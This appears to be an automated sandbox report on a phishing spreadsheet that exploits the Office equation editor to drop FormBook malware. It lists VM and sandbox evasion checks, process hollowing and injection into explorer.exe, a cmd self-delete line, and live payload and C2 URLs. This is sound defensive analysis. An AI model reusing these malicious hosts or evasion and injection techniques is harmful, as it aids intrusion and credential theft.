            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: Booking Confirmation.xlsxStream path 'EncryptedPackage' entropy: 7.99989686385 (max. 8.0)

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM_3Show sources
            Source: Yara matchFile source: 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2189207331.0000000002371000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2884, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000001298E4 second address: 00000000001298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000129B4E second address: 0000000000129B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00409A80 rdtsc
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2300Thread sleep time: -360000s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 2944Thread sleep time: -51520s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 2424Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 1920Thread sleep time: -36000s >= -30000s
            Source: C:\Windows\SysWOW64\raserver.exe TID: 3008Thread sleep time: -50000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: explorer.exe, 00000006.00000000.2191659808.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.2205247966.000000000842E000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000006.00000000.2197981181.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
            Source: explorer.exe, 00000006.00000000.2197956072.0000000004226000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD01dRom0
            Source: explorer.exe, 00000006.00000000.2197956072.0000000004226000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD01
            Source: explorer.exe, 00000006.00000000.2205247966.000000000842E000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: explorer.exe, 00000006.00000000.2197961773.0000000004234000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
            Source: explorer.exe, 00000006.00000000.2197918909.00000000041DB000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
            Source: explorer.exe, 00000006.00000002.2378407357.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00409A80 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0040ACC0 LdrLoadDll,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009226F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F826F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug
            Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 216.130.188.93 80
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 1388
            Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 1388
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 9A0000
            Writes to foreign memory regionsShow sources
            Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
            Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: explorer.exe, 00000006.00000000.2192054318.00000000006F0000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.2378520807.00000000009C0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000006.00000000.2192054318.00000000006F0000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.2378520807.00000000009C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000000.2191659808.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000006.00000000.2192054318.00000000006F0000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.2378520807.00000000009C0000.00000002.00000001.sdmpBinary or memory string: !Progman
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
            Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection712Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading111LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection712LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information41DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing2Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323046 Sample: Booking Confirmation.xlsx Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 39 www.akmh.pro 2->39 55 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus detection for URL or domain 2->59 61 15 other signatures 2->61 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 37 17 2->16         started        signatures3 process4 dnsIp5 47 workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu 103.125.191.5, 49165, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 11->47 33 C:\Users\user\AppData\...\svchost[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->79 18 vbc.exe 11->18         started        37 C:\Users\user\...\~$Booking Confirmation.xlsx, data 16->37 dropped file6 signatures7 process8 signatures9 49 Multi AV Scanner detection for dropped file 18->49 51 Writes to foreign memory regions 18->51 53 Injects a PE file into a foreign processes 18->53 21 RegSvcs.exe 18->21         started        process10 signatures11 63 Modifies the context of a thread in another process (thread injection) 21->63 65 Maps a DLL or memory area into another process 21->65 67 Sample uses process hollowing technique 21->67 69 2 other signatures 21->69 24 explorer.exe 21->24 injected process12 dnsIp13 41 affinitymotorsales.com 216.130.188.93, 49166, 80 WEBAIR-INTERNETUS United States 24->41 43 setyourhead.com 34.102.136.180, 49167, 80 GOOGLEUS United States 24->43 45 2 other IPs or domains 24->45 71 System process connects to network (likely due to code injection or exploit) 24->71 28 raserver.exe 24->28         started        signatures14 process15 signatures16 73 Modifies the context of a thread in another process (thread injection) 28->73 75 Maps a DLL or memory area into another process 28->75 77 Tries to detect virtualization through RDTSC time measurements 28->77 31 cmd.exe 28->31         started        process17

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Booking Confirmation.xlsx31%VirustotalBrowse
            Booking Confirmation.xlsx25%ReversingLabsDocument-Word.Trojan.Phishing

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe25%ReversingLabsWin32.Trojan.Wacatac
            C:\Users\Public\vbc.exe25%ReversingLabsWin32.Trojan.Wacatac

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.2.RegSvcs.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            setyourhead.com1%VirustotalBrowse
            workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu5%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.iis.fhg.de/audioPA0%URL Reputationsafe
            http://www.iis.fhg.de/audioPA0%URL Reputationsafe
            http://www.iis.fhg.de/audioPA0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu/worksdoc/svchost.exe100%Avira URL Cloudmalware
            http://%s.com0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://buscar.ozu.es/0%Avira URL Cloudsafe
            http://www.affinitymotorsales.com/kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg==0%Avira URL Cloudsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
            http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
            http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
            http://www.iask.com/0%URL Reputationsafe
            http://www.iask.com/0%URL Reputationsafe
            http://www.iask.com/0%URL Reputationsafe
            http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
            http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
            http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
            http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
            http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
            http://service2.bfast.com/0%URL Reputationsafe
            http://service2.bfast.com/0%URL Reputationsafe
            http://service2.bfast.com/0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            setyourhead.com
            		34.102.136.180
            		truetrueunknown
            workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
            		103.125.191.5
            		truetrueunknown
            affinitymotorsales.com
            		216.130.188.93
            		truetrue
              		unknown
              www.akmh.pro
              		unknown
              		unknowntrue
                		unknown
                www.setyourhead.com
                		unknown
                		unknowntrue
                  		unknown
                  www.affinitymotorsales.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu/worksdoc/svchost.exetrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.affinitymotorsales.com/kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg==true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                      		high
                      http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://search.ebay.de/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                        		high
                        http://www.mtv.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                          		high
                          http://www.rambler.ru/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                		high
                                http://buscar.ya.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2198231538.0000000004B50000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://asp.usatoday.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://rover.ebay.comexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://search.ebay.in/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://%s.comexplorer.exe, 00000006.00000000.2209306525.000000000A330000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		low
